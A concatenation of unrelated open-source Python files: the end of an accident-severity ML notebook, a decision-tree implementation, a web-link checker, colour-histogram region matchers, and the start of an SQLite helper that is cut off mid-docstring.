# Bare expression: only renders in a notebook cell; a no-op as a script.
year_wise_casualties
# In[74]:
# Casualties and speed-limit range per weekday, busiest day first.
cas_table = data.groupby(['Day_of_Week']).agg({'Number_of_Casualties':['sum'],'Speed_limit':['min','max']})
cas_table = cas_table.sort_values([('Number_of_Casualties','sum')],ascending=False)
cas_table = cas_table.reset_index()
cas_table.style.apply(max_val)
# In[75]:
# Linear correlation of every numeric column with the target.
corr_matrix = data.corr()
corr_matrix["Accident_Severity"].sort_values(ascending=False)
# In[76]:
# Histograms of every numeric column.
data.hist(bins=50, figsize=(20,15))
plt.show()
# In[77]:
# Geographic scatter of accidents coloured by severity.
fig = data.plot(kind="scatter", x="Longitude", y="Latitude", alpha=0.6,
    figsize=(18,11),c="Accident_Severity", cmap=plt.get_cmap("inferno"),
    colorbar=True,)
# In[78]:
# Pairwise scatter plots of the candidate predictors.
attributes = ["Number_of_Vehicles","Number_of_Casualties", "Time", "Road_Type", "Pedestrian_Crossing-Human_Control", "Pedestrian_Crossing-Physical_Facilities", "Light_Conditions", "Weather_Conditions", "Road_Surface_Conditions","Accident_Severity"]
scatter_matrix(data[attributes], figsize=(10, 10))
# In[79]:
def preprocessing(data):
    """Clean and encode the accident frame; return a (train, test) split.

    NOTE(review): the first drop/dropna calls use inplace=True, so the
    caller's DataFrame is mutated before `data` is rebound — re-running
    this on the same frame will KeyError on the already-dropped columns;
    confirm this is acceptable for the notebook workflow.
    """
    #Drop useless columns and nan values
    data.drop(['Police_Force', 'Junction_Detail', 'Junction_Control', 'Special_Conditions_at_Site', 'Carriageway_Hazards', 'Did_Police_Officer_Attend_Scene_of_Accident', 'LSOA_of_Accident_Location', 'Local_Authority_(District)', 'Local_Authority_(Highway)'], axis=1, inplace=True)
    data.dropna(inplace=True)
    #Drop rows with 'Unknown' values
    data = data[data.Weather_Conditions!='Unknown']
    data = data[data.Road_Type!='Unknown']
    #Encode "String" Labels into "Int" Labels for easy training
    le = LabelEncoder()
    data["Pedestrian_Crossing-Physical_Facilities"]= le.fit_transform(data["Pedestrian_Crossing-Physical_Facilities"])
    data["Light_Conditions"]= le.fit_transform(data["Light_Conditions"])
    data["Weather_Conditions"] = le.fit_transform(data["Weather_Conditions"])
    data["Road_Surface_Conditions"] = le.fit_transform(data["Road_Surface_Conditions"])
    data["Pedestrian_Crossing-Human_Control"] = le.fit_transform(data["Pedestrian_Crossing-Human_Control"])
    data["Road_Type"] = le.fit_transform(data["Road_Type"])
    #Converting Time into Int for easy training: keep only the hour digits.
    data["Time"]= data["Time"].astype(str)
    data['Time']=data['Time'].str.slice(0,2, 1)
    data["Time"]= data["Time"].astype(int)
    #Creating 3 additional columns, one each for each class we need to classify into
    onehot = pd.get_dummies(data.Accident_Severity,prefix=['Severity'])
    data["Fatal"] = onehot["['Severity']_1"]
    data["Severe"] = onehot["['Severity']_2"]
    data["Slight"] = onehot["['Severity']_3"]
    #Finally splitting the data into train and test (75/25, unseeded)
    train,test = train_test_split(data,test_size=.25)
    return (train,test)
# In[80]:
# Clean/encode the data and split it into train and test frames.
train,test = preprocessing(data)
# In[81]:
# Predictor matrices: every encoded feature except the target columns.
train_features = train[["Number_of_Vehicles","Number_of_Casualties", "Day_of_Week", "Time", "Road_Type", "Speed_limit", "Pedestrian_Crossing-Human_Control", "Pedestrian_Crossing-Physical_Facilities", "Light_Conditions", "Weather_Conditions", "Road_Surface_Conditions","Year", "Urban_or_Rural_Area"]]
test_features =test[["Number_of_Vehicles","Number_of_Casualties", "Day_of_Week", "Time", "Road_Type", "Speed_limit", "Pedestrian_Crossing-Human_Control", "Pedestrian_Crossing-Physical_Facilities", "Light_Conditions", "Weather_Conditions", "Road_Surface_Conditions","Year", "Urban_or_Rural_Area"]]
# In[ ]:
def model():
    """Train one EasyEnsemble(XGBoost) classifier per severity class and
    pickle each fitted model.

    Relies on module-level globals: train/test (from preprocessing),
    class_names, train_features/test_features, plus EasyEnsembleClassifier
    and XGBClassifier imported elsewhere in the file.

    :return: (scores, acc_score) -- per-class 3-fold CV ROC-AUC and
        held-out test ROC-AUC, in class_names order.
    """
    scores = []
    acc_score=[]
    # Per-row sample weights, constant per class (Fatal rows weighted 0.3, etc.).
    fat_weights = [0.3 for i in range(train["Fatal"].shape[0])]
    sev_weights = [0.5 for i in range(train["Severe"].shape[0])]
    sli_weights = [1 for i in range(train["Slight"].shape[0])]
    class_weights={"Fatal":fat_weights,"Severe":sev_weights,"Slight":sli_weights}
    submission = pd.DataFrame.from_dict({'Accident_Index': test['Accident_Index']})
    for class_name in class_names:
        # One-vs-rest binary target for this severity class.
        train_target = train[class_name]
        classifier = EasyEnsembleClassifier(n_estimators=12, base_estimator=XGBClassifier(max_depth=4, learning_rate=0.2, n_estimators=600, silent=True,
                                            subsample = 0.8,
                                            gamma=0.5,
                                            min_child_weight=10,
                                            objective='binary:logistic',
                                            colsample_bytree = 0.6,
                                            max_delta_step = 1,
                                            nthreads=1,
                                            n_jobs=1))
        cv_score = np.mean(cross_val_score(
            classifier, train_features, train_target, cv=3, scoring='roc_auc'))
        scores.append(cv_score)
        # print('CV score for class {} is {}'.format(class_name, cv_score))
        classifier.fit(train_features, train_target, sample_weight = class_weights[class_name])
        submission[class_name] = classifier.predict_proba(test_features)[:, 1]
        acc = roc_auc_score(test[class_name],submission[class_name])
        acc_score.append(acc)
        # print('Mean accuracy for class {} is {}'.format(class_name,acc))
        #Pickling the model
        # NOTE(review): the exported notebook's indentation was ambiguous; mode
        # 'ab' appends, so placed inside the loop this saves one model per
        # class -- confirm against the original notebook.
        model_pkl = open('Accident_Severity_Prediction_Model_Pkl.pkl','ab')
        pickle.dump(classifier,model_pkl)
        model_pkl.close()
    return (scores,acc_score)
# Fit all three one-vs-rest models and report the averaged scores.
cv,acc = model()
# In[ ]:
print('Total CV score is {}'.format(np.mean(cv)))
print('Total accuracy score is {}'.format(np.mean(acc)))
| true |
c6373d839c57dbdcc4efb916873f7ce6ff6372d0 | Python | JiaweiD/DecisionTree | /trees.py | UTF-8 | 7,366 | 3.09375 | 3 | [] | no_license | import operator
from math import log
#calculate Shannon Entrophy of a dataset
def calcShannonEnt(dataSet):
    """Return the Shannon entropy (base 2) of the class labels in dataSet.

    Each row's final element is treated as the class label.
    """
    total = len(dataSet)
    labelTally = {}
    for row in dataSet:
        label = row[-1]
        labelTally[label] = labelTally.get(label, 0) + 1
    entropy = 0.0
    for count in labelTally.values():
        p = float(count) / total
        entropy -= p * log(p, 2)
    return entropy
#split a dataset by a certain value of a certain axis
def splitDataSet(dataSet, axis, value):
    """Return the rows whose feature at index `axis` equals `value`,
    with that feature column removed from each returned row."""
    return [row[:axis] + row[axis + 1:] for row in dataSet if row[axis] == value]
#choose the best feature to split by information gain
def chooseBestFeatureToSplitByGain(dataSet):
    """ID3 criterion: return the feature index whose split maximises
    information gain, or -1 when no split yields positive gain."""
    numFeatures = len(dataSet[0]) - 1
    baseEntropy = calcShannonEnt(dataSet)
    bestFeature = -1
    bestGain = 0.0
    for featIdx in range(numFeatures):
        featureValues = set(example[featIdx] for example in dataSet)
        # Weighted entropy of the partition induced by this feature.
        splitEntropy = 0.0
        for value in featureValues:
            subset = splitDataSet(dataSet, featIdx, value)
            weight = len(subset) / float(len(dataSet))
            splitEntropy += weight * calcShannonEnt(subset)
        gain = baseEntropy - splitEntropy
        if gain > bestGain:
            bestGain = gain
            bestFeature = featIdx
    return bestFeature
#choose the best feature to split by information gain(when dealing with continuous attributes)
def chooseBestContinuousFeatureToSplitByGain(dataSet):
    """Pick the feature with the best binary split on a continuous value.

    Candidate thresholds are the midpoints of consecutive feature values;
    for each threshold the rows are partitioned into "< threshold" and
    ">= threshold" and the information gain of the partition is evaluated.

    Bug fixes versus the original:
    - subsets were built by slicing `dataSet` (the whole table) instead of
      `dataVec` (the current row), so the wrong data was dropped;
    - rows were accumulated with `extend`, flattening them into bare values;
    - `newEntrophy` was overwritten with a *gain* inside the threshold loop,
      so the outer comparison mixed entropies and gains.

    :return: index of the best feature, or -1 if no split has positive gain.
    """
    numFeatures = len(dataSet[0]) - 1
    baseEntrophy = calcShannonEnt(dataSet)
    bestInfoGain = 0.0
    bestFeature = -1
    bestAttrValue = 0  # best threshold seen so far (kept for debugging)
    for i in range(numFeatures):
        featList = [example[i] for example in dataSet]
        # NOTE(review): midpoints are taken over values in file order, not
        # sorted order, matching the original behaviour -- confirm intent.
        midPointList = [(float(featList[j]) + float(featList[j + 1])) / 2
                        for j in range(len(featList) - 1)]
        for value in midPointList:
            subDataSetLess = []
            subDataSetMore = []
            for dataVec in dataSet:
                # Drop feature column i from the row before bucketing it.
                reducedVec = dataVec[:i] + dataVec[i + 1:]
                if float(dataVec[i]) < value:
                    subDataSetLess.append(reducedVec)
                else:
                    subDataSetMore.append(reducedVec)
            probLess = len(subDataSetLess) / float(len(dataSet))
            probMore = len(subDataSetMore) / float(len(dataSet))
            attrEntrophy = (probLess * calcShannonEnt(subDataSetLess)
                            + probMore * calcShannonEnt(subDataSetMore))
            attrInfoGain = baseEntrophy - attrEntrophy
            if attrInfoGain > bestInfoGain:
                bestInfoGain = attrInfoGain
                bestAttrValue = value
                bestFeature = i
    return bestFeature
#choose the best feature to split by information gain ratio(C4.5)
def chooseBestFeatureToSplitByGainRatio(dataSet):
    """C4.5 criterion: return the feature index maximising gain ratio
    (information gain divided by the feature's intrinsic value).

    Fixes versus the original:
    - a feature with a single unique value has intrinsic value 0, which
      previously raised ZeroDivisionError; such features are now skipped
      (they cannot split the data anyway);
    - the intrinsic-value computation divides as floats explicitly, so it
      also behaves correctly under Python 2 integer division.

    :return: index of the best feature, or -1 if no feature qualifies.
    """
    numFeatures = len(dataSet[0]) - 1
    baseEntrophy = calcShannonEnt(dataSet)
    bestInfoGainRatio = 0.0
    bestFeature = -1
    for i in range(numFeatures):
        featList = [example[i] for example in dataSet]
        uniqueVals = set(featList)
        # Intrinsic value: entropy of the feature's own value distribution.
        valueCounts = {}
        for value in featList:
            valueCounts[value] = valueCounts.get(value, 0) + 1
        IntrinsicValue = 0.0
        for count in valueCounts.values():
            p = float(count) / len(featList)
            IntrinsicValue -= p * log(p, 2)
        if IntrinsicValue == 0:
            # Single-valued feature: no split possible, gain ratio undefined.
            continue
        newEntrophy = 0.0
        for value in uniqueVals:
            subDataSet = splitDataSet(dataSet, i, value)
            prob = len(subDataSet) / float(len(dataSet))
            newEntrophy += prob * calcShannonEnt(subDataSet)
        infoGain = baseEntrophy - newEntrophy
        infoGainRatio = infoGain / IntrinsicValue
        if (infoGainRatio > bestInfoGainRatio):
            bestInfoGainRatio = infoGainRatio
            bestFeature = i
    return bestFeature
#calculate the gini index of a dataset
def calcGini(dataSet):
    """Return the Gini impurity of the class labels (last column) of dataSet."""
    total = len(dataSet)
    tally = {}
    for row in dataSet:
        tally[row[-1]] = tally.get(row[-1], 0) + 1
    return 1.0 - sum((float(count) / total) ** 2 for count in tally.values())
#choose the best feature to split by gini index(CART)
def chooseBestFeatureToSplitByGini(dataSet):
    """CART criterion: return the feature index whose split minimises the
    weighted Gini impurity of the resulting partition."""
    numFeatures = len(dataSet[0]) - 1
    bestFeature = -1
    bestGiniIndex = 99999
    for featIdx in range(numFeatures):
        weightedGini = 0.0
        for value in set(example[featIdx] for example in dataSet):
            subset = splitDataSet(dataSet, featIdx, value)
            weightedGini += (len(subset) / float(len(dataSet))) * calcGini(subset)
        if weightedGini < bestGiniIndex:
            bestGiniIndex = weightedGini
            bestFeature = featIdx
    return bestFeature
#deciding the classification of the leaf nodes by voting
def majorityCnt(classList):
    """Return the most frequent class label.

    Ties resolve to the label encountered first (sorted() is stable).
    """
    tally = {}
    for label in classList:
        tally[label] = tally.get(label, 0) + 1
    ranked = sorted(tally.items(), key=operator.itemgetter(1), reverse=True)
    return ranked[0][0]
#create a decision tree
def createTree(dataSet,labels):
    """Recursively build a decision tree as nested dicts keyed by feature
    label, then by feature value.

    NOTE(review): `labels` is mutated in place (`del labels[bestFeat]`), so
    the caller's list shrinks as the tree is built -- pass a copy if the
    original list matters.

    :param dataSet: rows whose last column is the class label
    :param labels: feature names aligned with the feature columns
    :return: nested dict tree, or a class label for leaf cases
    """
    classList = [example[-1] for example in dataSet]
    # All rows share one class: pure leaf.
    if classList.count(classList[0]) == len(classList):
        return classList[0]
    # Only the class column remains: fall back to a majority-vote leaf.
    if len(dataSet[0]) == 1:
        return majorityCnt(classList)
    bestFeat = chooseBestFeatureToSplitByGain(dataSet)
    bestFeatLabel = labels[bestFeat]
    myTree = {bestFeatLabel:{}}
    del labels[bestFeat]
    featValues = [example[bestFeat] for example in dataSet]
    uniqueVals = set(featValues)
    for value in uniqueVals:
        # Copy the remaining labels so sibling branches don't interfere.
        subLabels = labels[:]
        myTree[bestFeatLabel][value] = createTree(splitDataSet(dataSet,bestFeat,value),subLabels)
    return myTree
#classifying function when testing
def classify(inputTree, featLabels, testVec):
    """Walk the decision tree and return the predicted class for testVec.

    `featLabels` maps feature names (the tree's keys) back to positions in
    testVec. An unseen feature value raises UnboundLocalError, matching the
    original behaviour.
    """
    rootLabel = list(inputTree.keys())[0]
    branches = inputTree[rootLabel]
    featIndex = featLabels.index(rootLabel)
    for branchValue, subtree in branches.items():
        if testVec[featIndex] == branchValue:
            if isinstance(subtree, dict):
                classLabel = classify(subtree, featLabels, testVec)
            else:
                classLabel = subtree
    return classLabel
#store trees
def storeTree(inputTree, filename):
    """Pickle a decision tree to `filename`.

    Improvement: uses a context manager so the file is closed even when
    pickling raises, instead of a bare open()/close() pair.

    :param inputTree: nested-dict tree produced by createTree
    :param filename: destination path (written in binary mode)
    """
    import pickle
    with open(filename, 'wb') as fw:
        pickle.dump(inputTree, fw)
def grabTree(filename):
    """Unpickle and return a decision tree stored by storeTree.

    Bug fixes: the original printed the loaded tree and implicitly returned
    None -- so the "grabbed" tree was lost -- and it never closed the file
    handle. The tree is now returned and the file is closed via `with`.

    :param filename: path of a pickle file
    :return: the unpickled tree object
    """
    import pickle
    with open(filename, 'rb') as fr:
        return pickle.load(fr)
| true |
da7413af6b68f35a9f45552c7ecfc5262d0c8476 | Python | riverxieh/ariadne | /ariadne/matchers/visual_matchers.py | UTF-8 | 11,746 | 2.796875 | 3 | [] | no_license | import math
import numpy as np
import skimage.color
from scipy.stats import multivariate_normal
from scipy.stats import norm
import cv2
class VisualMatcher(object):
    """Base class for appearance-based matchers over an ariadne graph.

    Subclasses override computeCost to return a visual distance between
    two graph nodes.
    """

    def __init__(self, ariadne):
        self.ariadne = ariadne

    def computeCost(self, n1, n2):
        """Default cost between two nodes: zero (no visual penalty)."""
        return 0.0
class SimpleColorMatcher(VisualMatcher):
    """Cost = Euclidean distance between the two nodes' mean colours."""

    def __init__(self, ariadne):
        super(SimpleColorMatcher, self).__init__(ariadne)

    def computeCost(self, n1, n2):
        """L2 distance between the 'mean color' attributes of n1 and n2."""
        first = self.ariadne.graph.node(n1)
        second = self.ariadne.graph.node(n2)
        return np.linalg.norm(first['mean color'] - second['mean color'])
class LabHistogramMatcher(VisualMatcher):
    """Cost = normalised L2 distance between per-region CIELAB histograms.

    Histograms are cached per region in `self.histogram_map`.
    """

    def __init__(self, ariadne, bins=[8, 8, 8], precompute_histograms=False):
        # NOTE(review): the mutable default `bins` is shared across calls; it
        # is only read here, so it is kept for interface compatibility.
        super(LabHistogramMatcher, self).__init__(ariadne)
        self.bins = bins
        # Largest possible distance between two histograms whose channels are
        # each max-normalised to 1 -- used to scale costs into [0, 1].
        self.max_distance = math.sqrt(np.sum(np.array(bins).ravel()))
        self.histogram_map = {}
        if precompute_histograms:
            nodes = self.ariadne.graph.nodes()
            for i, n in enumerate(nodes):
                region = self.ariadne.graph.region(n)
                histo = self.regionHistogram(region)
                self.histogram_map[region] = histo
                print("Histogram percentage", 100.0 *
                      float(i) / float(len(nodes)))

    def regionHistogram(self, region):
        """Return (and cache) the concatenated L/a/b histogram of a region.

        Bug fix: the pixel accumulator was initialised as `colors_list` but
        appended to as `colors_lab`, raising NameError on every cache miss.
        """
        if region in self.histogram_map:
            return self.histogram_map[region]
        colors_lab = []
        coords = region['coords']
        for p1 in coords:
            color = self.ariadne.image[p1[0], p1[1], :]
            color_lab = skimage.color.rgb2lab(color.reshape((1, 1, 3)))
            colors_lab.append(color_lab)
        colors_lab = np.array(colors_lab).reshape((len(coords), 3))
        l = colors_lab[:, 0]
        a = colors_lab[:, 1]
        b = colors_lab[:, 2]
        # Channel ranges follow the CIELAB convention: L in [0, 100],
        # a and b in [-127, 128].
        hl, _ = np.histogram(l, self.bins[0], range=(0, 100.0))
        ha, _ = np.histogram(a, self.bins[1], range=(-127., 128.))
        hb, _ = np.histogram(b, self.bins[2], range=(-127., 128.))
        hl = np.array(hl).astype(float)
        ha = np.array(ha).astype(float)
        hb = np.array(hb).astype(float)
        # Per-channel max-normalisation so each channel peaks at 1.
        hl = hl / np.max(hl)
        ha = ha / np.max(ha)
        hb = hb / np.max(hb)
        histo = np.concatenate((hl, ha, hb))
        self.histogram_map[region] = histo
        return histo

    def computeCost(self, n1, n2):
        """Distance in [0, 1] between the two nodes' region histograms."""
        r1 = self.ariadne.graph.region(n1)
        r2 = self.ariadne.graph.region(n2)
        h1 = self.regionHistogram(r1)
        h2 = self.regionHistogram(r2)
        return np.linalg.norm(h1 - h2) / self.max_distance
class PathVisualMatcher(object):
    """Base class for matchers that score candidate nodes against a path.

    Subclasses override computePDF to return a likelihood for a node.
    """

    def __init__(self, ariadne, path):
        self.ariadne = ariadne
        self.path = path

    def computePDF(self, n1):
        """Default likelihood of node n1 continuing the path: zero."""
        return 0.0
class PathLabHistogramMatcher(PathVisualMatcher):
    """Scores how well a candidate region's CIELAB histogram matches the
    last region of the current path (histograms normalised by pixel count)."""

    def __init__(self, ariadne, path, bins=[8, 8, 8], precompute_histograms=False):
        # NOTE(review): mutable default `bins` is shared across instances;
        # it is only read, so this is benign but worth knowing.
        super(PathLabHistogramMatcher, self).__init__(ariadne, path)
        self.bins = bins
        self.max_distance = math.sqrt(np.sum(np.array(bins).ravel()))
        self.histogram_map = {}  # region -> cached histogram
        if precompute_histograms:
            nodes = self.ariadne.graph.nodes()
            for i, n in enumerate(nodes):
                region = self.ariadne.graph.region(n)
                histo = self.regionHistogram(region)
                self.histogram_map[region] = histo
                # print(histo)
                print("Histogram percentage", 100.0 *
                      float(i) / float(len(nodes)))

    def regionHistogram(self, region):
        """Return (and cache) the region's concatenated L/a/b histogram,
        normalised by pixel count so each channel sums to 1."""
        if region in self.histogram_map:
            return self.histogram_map[region]
        colors_lab = []
        coords = region['coords']
        for p1 in coords:
            color = self.ariadne.image[p1[0], p1[1], :]
            # colors.append(color)
            color_lab = skimage.color.rgb2lab(color.reshape((1, 1, 3)))
            colors_lab.append(color_lab)
        # colors = np.array(colors)
        colors_lab = np.array(colors_lab).reshape((len(coords), 3))
        l = colors_lab[:, 0]
        a = colors_lab[:, 1]
        b = colors_lab[:, 2]
        # CIELAB ranges: L in [0, 100], a/b in [-127, 128].
        hl, _ = np.histogram(l, self.bins[0], range=(0, 100.0))
        ha, _ = np.histogram(a, self.bins[1], range=(-127., 128.))
        hb, _ = np.histogram(b, self.bins[2], range=(-127., 128.))
        # Normalise by pixel count -> per-channel probability mass.
        hl = hl / float(len(coords))
        hb = hb / float(len(coords))
        ha = ha / float(len(coords))
        hl = np.array(hl).astype(float)
        ha = np.array(ha).astype(float)
        hb = np.array(hb).astype(float)
        histo = np.concatenate((hl, ha, hb))
        self.histogram_map[region] = histo
        return histo

    def computePDF(self, n2):
        """Likelihood of node n2 under a Gaussian centred on the histogram
        of the path's last region (identity covariance).

        Returns 1.0 for an empty path (no reference region yet).
        """
        if self.path.size() == 0:
            return 1.0
        r1 = self.ariadne.graph.region(self.path.last_node)
        r2 = self.ariadne.graph.region(n2)
        h1 = self.regionHistogram(r1)
        h2 = self.regionHistogram(r2)
        mn = multivariate_normal(h1)
        return mn.pdf(h2)
        # return np.linalg.norm(node1['mean color'] - node2['mean color'])
class ColorPathHistogramMatcher(PathVisualMatcher):
    """Path matcher with a configurable colour descriptor (CIELAB or
    Ballard opponent axes) and either histogram-intersection or Gaussian
    scoring of candidate regions against the path's last region."""

    DESCRIPTOR_CEILAB = "DESCRIPTOR_CEILAB"
    DESCRIPTOR_BALLARD = "DESCRIPTOR_BALLARD"

    def __init__(self, ariadne, path, bins=[8, 8, 8], precompute_histograms=False, descriptor="DESCRIPTOR_CEILAB",instogram_intersection=True,single_part_normalization=False):
        # NOTE(review): the parameter name 'instogram_intersection' (sic) is
        # kept as-is -- renaming it would break keyword callers.
        super(ColorPathHistogramMatcher, self).__init__(ariadne, path)
        self.bins = bins
        self.max_distance = math.sqrt(np.sum(np.array(bins).ravel()))
        self.histogram_map = {}  # region -> cached histogram
        self.descriptor = descriptor
        self.histogram_intersection = instogram_intersection
        self.single_part_normalization = single_part_normalization
        if precompute_histograms:
            nodes = self.ariadne.graph.nodes()
            for i, n in enumerate(nodes):
                region = self.ariadne.graph.region(n)
                histo = self.regionHistogram(region)
                self.histogram_map[region] = histo
                # print(histo)
                print("Histogram percentage", 100.0 *
                      float(i) / float(len(nodes)))

    def colorFeature(self, color_input):
        """Map an RGB pixel to the selected descriptor space.

        Implicitly returns None for unknown descriptors (no else branch).
        """
        if self.descriptor == ColorPathHistogramMatcher.DESCRIPTOR_CEILAB:
            return skimage.color.rgb2lab(color_input.reshape((1, 1, 3)))
        elif self.descriptor == ColorPathHistogramMatcher.DESCRIPTOR_BALLARD:
            # Opponent-colour axes: intensity, red-green, blue-yellow.
            ballard = np.array([
                color_input[0]+color_input[1]+color_input[2],
                color_input[0]-color_input[1],
                2.0*color_input[2]-color_input[0]-color_input[1]
            ])
            return ballard

    def colorFeatureRange(self):
        """Per-channel histogram ranges matching the selected descriptor."""
        if self.descriptor == ColorPathHistogramMatcher.DESCRIPTOR_CEILAB:
            return [(0, 100.0),(-127., 128.),(-127., 128.)]
        elif self.descriptor == ColorPathHistogramMatcher.DESCRIPTOR_BALLARD:
            return [(0.0,3.0),(-1.0,1.0),(-2.0,2.0)]

    def regionHistogram(self, region):
        """Return (and cache) the region's concatenated 3-channel histogram
        in the selected descriptor space."""
        if region in self.histogram_map:
            return self.histogram_map[region]
        colors_list = []
        coords = region['coords']
        for p1 in coords:
            color = self.ariadne.image[p1[0], p1[1], :]
            colors_list.append(self.colorFeature(color))
        colors_list = np.array(colors_list).reshape((len(coords), 3))
        l = colors_list[:, 0]
        a = colors_list[:, 1]
        b = colors_list[:, 2]
        ranges = self.colorFeatureRange()
        hl, _ = np.histogram(l, self.bins[0], range=ranges[0])
        ha, _ = np.histogram(a, self.bins[1], range=ranges[1])
        hb, _ = np.histogram(b, self.bins[2], range=ranges[2])
        # Optional per-channel normalisation by pixel count.
        if self.single_part_normalization:
            hl = hl / float(len(coords))
            hb = hb / float(len(coords))
            ha = ha / float(len(coords))
        hl = np.array(hl).astype(float)
        ha = np.array(ha).astype(float)
        hb = np.array(hb).astype(float)
        histo = np.concatenate((hl, ha, hb))
        self.histogram_map[region] = histo
        return histo

    def return_intersection(self,hist_1, hist_2):
        """Histogram intersection of hist_1 and hist_2, normalised by the
        total mass of hist_2 (asymmetric)."""
        minima = np.minimum(hist_1, hist_2)
        intersection = np.true_divide(np.sum(minima), np.sum(hist_2))
        return intersection

    def computePDF(self, n2):
        """Score node n2 against the path's last region.

        Uses histogram intersection when enabled, otherwise a Gaussian pdf
        centred on the reference histogram. Empty path -> 1.0.
        """
        if self.path.size() == 0:
            return 1.0
        r1 = self.ariadne.graph.region(self.path.last_node)
        r2 = self.ariadne.graph.region(n2)
        h1 = self.regionHistogram(r1)
        h2 = self.regionHistogram(r2)
        mn = multivariate_normal(h1)
        if self.histogram_intersection:
            return self.return_intersection(h1,h2)
        else:
            return mn.pdf(h2)
        # return np.linalg.norm(node1['mean color'] - node2['mean color'])
class Color2DHistogramMatcher(PathVisualMatcher):
    """Matcher over joint hue/saturation (2-D) histograms computed with
    OpenCV; regions are compared by histogram intersection."""

    DESCRIPTOR_CEILAB = "DESCRIPTOR_CEILAB"
    DESCRIPTOR_BALLARD = "DESCRIPTOR_BALLARD"

    def __init__(self, ariadne, bins=[32,32], precompute_histograms=False, descriptor="DESCRIPTOR_CEILAB",instogram_intersection=True,single_part_normalization=False):
        # No per-path state is used, so the base-class path is set to None.
        super(Color2DHistogramMatcher, self).__init__(ariadne, None)
        # NOTE(review): assumes ariadne.image is RGB float in [0, 1] -- confirm.
        self.img = (ariadne.image * 255.0).astype(np.uint8)
        self.img = cv2.cvtColor(self.img, cv2.COLOR_RGB2BGR)
        # NOTE(review): COLOR_RGB2HSV is applied to an image already converted
        # to BGR above, which swaps the red/blue channels before the HSV
        # conversion -- confirm this double conversion is intentional.
        self.hsv = cv2.cvtColor(self.img, cv2.COLOR_RGB2HSV)
        self.h, self.s, self.v = cv2.split(self.hsv)
        self.bins = bins
        self.max_distance = math.sqrt(np.sum(np.array(bins).ravel()))
        self.histogram_map = {}
        self.descriptor = descriptor
        self.histogram_intersection = instogram_intersection
        self.single_part_normalization = single_part_normalization
        # if precompute_histograms:
        #     nodes = self.ariadne.graph.nodes()
        #     for i, n in enumerate(nodes):
        #         region = self.ariadne.graph.region(n)
        #         histo = self.regionHistogram(region)
        #         self.histogram_map[region] = histo
        #         # print(histo)
        #         print("Histogram percentage", 100.0 *
        #             float(i) / float(len(nodes)))

    def regionHistogram(self, n):
        """2-D hue/saturation histogram of node n's region mask, normalised
        to unit mass. Note: uses fixed 32x32 bins, not self.bins."""
        hist = cv2.calcHist(
            [self.hsv],
            [0, 1],
            self.ariadne.graph.maskImage(n),
            [32, 32],
            [0, 180, 0, 256]
        )
        hist = hist / np.sum(hist.ravel())
        return hist
    def histogramComparison(self,h1, h2):
        """Compare two histograms with OpenCV's intersection metric."""
        return cv2.compareHist(h1, h2, cv2.HISTCMP_INTERSECT)
        #return cv2.compareHist(h1, h2, cv2.HISTCMP_BHATTACHARYYA)

    def compare(self, n1,n2):
        """Intersection score between the histograms of nodes n1 and n2."""
        h1 = self.regionHistogram(n1)
        h2 = self.regionHistogram(n2)
        return self.histogramComparison(h1,h2)

    def normalizeComparison(self,current_value,max_value):
        """Turn a similarity score into a weight peaked around max_value,
        using two narrow Gaussians offset by +/-delta around the gap."""
        dx = math.fabs(current_value-max_value)
        delta = 0.05
        p1 = norm.pdf(dx+delta,scale=0.02)
        p2 = norm.pdf(dx-delta,scale=0.02)
        return (delta / 2.0) * (p1 + p2)
        #return math.exp(-((current_value - max_value)**2.0)/(2*(0.2**2)))
| true |
b6154c000cb05d61825daddaa92f8794518fee21 | Python | SandyTaillan/projet-liens-web | /gestlien.py | UTF-8 | 2,448 | 2.640625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
#
import requests
import urllib3
class Gestionlienweb:
    """Groups together all handling of valid and invalid web links."""

    def veriflien(self, monurl, mondepre):
        """Check whether a link is reachable and update its depreciation.

        Handler order matters: requests exception classes are related by
        inheritance (e.g. ConnectTimeout derives from ConnectionError), so
        the more specific handlers must come first.

        :param monurl: URL to test
        :param mondepre: current depreciation score for the link
        :return: (situation, depreciation) -- a status string (French, used
            elsewhere in the app) and the updated depreciation score
        """
        # Variable declaration.
        situation = ""
        ajout_depre = 0
        # Accepted 2xx success codes besides 200 (handled via requests.codes.ok).
        listhttp_1 = [201, 202, 203, 204, 205, 206, 207, 208, 210, 226]
        try:
            r = requests.get(monurl, timeout=7)
            if r.status_code == requests.codes.ok:
                situation = "tout va bien"
            elif r.status_code in listhttp_1:
                situation = "tout va bien"
            # NOTE(review): 4xx/5xx responses leave `situation` as "" with no
            # depreciation change -- confirm callers expect an empty status.
        except requests.exceptions.SSLError:
            situation = "erreur: ssl"
            ajout_depre = 10
        except requests.exceptions.ConnectTimeout:
            situation = "erreur: temps connection"
            ajout_depre = 10
        except requests.exceptions.InvalidSchema:
            situation = "erreur: Schema invalid"
            ajout_depre = 100
        except requests.exceptions.ReadTimeout:
            situation = "erreur: temps imparti"
            ajout_depre = 10
        except requests.exceptions.ProxyError:
            situation = "erreur: proxy"
            ajout_depre = 10
        except requests.exceptions.HTTPError:
            situation = "erreur: http"
            ajout_depre = 10
        except requests.exceptions.MissingSchema:
            situation = "erreur: schéma manquant"
            ajout_depre = 10
        except requests.exceptions.InvalidURL:
            situation = "erreur: url invalid"
            ajout_depre = 50
        except requests.exceptions.ConnectionError:
            situation = "erreur: connection"
            ajout_depre = 10
        except requests.exceptions.TooManyRedirects:
            situation = "erreur: Trop de redirection"
            ajout_depre = 20
        except requests.exceptions.RequestException:
            # Catch-all for any other requests failure.
            situation = "erreur: erreur sur requests"
            ajout_depre = 10
        except urllib3.exceptions.DecodeError:
            situation = "erreur: problème de décodage"
            ajout_depre = 20
        # except:
        #     situation = "Erreur: inconnue"
        depreciation = mondepre + ajout_depre
        print(f"la situation du lien est : {situation} avec une depréciation de {depreciation}")
        return situation, depreciation
| true |
a21df85e0b695dc1714301a1f088f27c1adc6ef3 | Python | Homyakin/FlaskLab | /database/database.py | UTF-8 | 1,303 | 2.96875 | 3 | [] | no_license | import sqlite3
from sqlite3 import Error
def create_connection(db_file='app/data/data.db'):
    """Create a database connection to an SQLite database.

    Fix: the original docstring documented a `db_file` parameter that did not
    exist -- the path was hard-coded. It is now a real parameter whose default
    keeps the original location, so existing callers are unaffected.

    :param db_file: path of the SQLite database file
    :return: Connection object, or None if the connection failed
    """
    conn = None
    try:
        conn = sqlite3.connect(db_file)
    except Error as e:
        # Best-effort: report the failure and fall through to return None.
        print(e)
    return conn
def get(conn, fields):
    """Return the requested columns for every row of the INFO table.

    :param conn: open sqlite3 connection
    :param fields: list of column names to select -- interpolated directly
